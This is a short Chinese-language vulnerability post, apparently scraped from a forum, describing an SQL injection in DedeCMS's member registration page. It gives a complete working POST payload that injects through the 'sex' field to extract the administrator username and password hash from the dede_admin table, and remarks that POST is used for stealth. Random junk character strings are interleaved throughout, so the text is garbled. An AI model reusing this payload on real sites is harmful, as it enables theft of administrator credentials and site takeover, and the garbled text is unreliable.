漏洞类型: SQL注射漏洞
% W5 {+ W! U9 e简要描述:) Q7 j( D2 V6 A3 p% ]8 d! k
4 Q) A! B9 d1 s; ?0 c8 c% o
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
$ V8 [6 f6 @0 n4 y: q/ l原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
) T1 O* q3 d; [5 r( e T( Y4 J+ i$ ~详细说明:跟这个漏洞
3 K" p' l7 ^- o# O7 `! W
8 A5 E, ~: }- z! d" l# x) K: \9 ?+ F# qWooYun: Dedecms SQL注射导致审核机制绕过漏洞, Z8 [# f: S) \. j& s
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.2 }, n" h* O3 b0 D/ \! H
POST提交以下数据,其实不用POST提交的,这样隐蔽点.) i6 b O, J( F$ U6 K& s
( s2 T' s7 D4 K! Q* V; _; { V0 r
www.political-security.com/member/reg_new.php
, c. w: I% `. r0 O8 U' A) z 5 ^9 o8 k9 k2 L# a8 x/ P& p! N1 a
POST
* g/ O: U7 O- v4 b" Y1 C4 J T u" v7 c7 z5 Y3 Z
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
" W6 ]$ _* |/ y4 x( _userid=c4rp3nt3r&uname=c4rp3nt3r2 R6 b$ S& n$ N( `; Y# D7 A
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
: _) d' B# v- i! O* N+ a3 i; J&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
/ M8 W1 U6 q& |# z1 Q) V- l(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
! a- M s/ j# S) m& R+ v3 u$ _%00&vdcode=glos&agree= |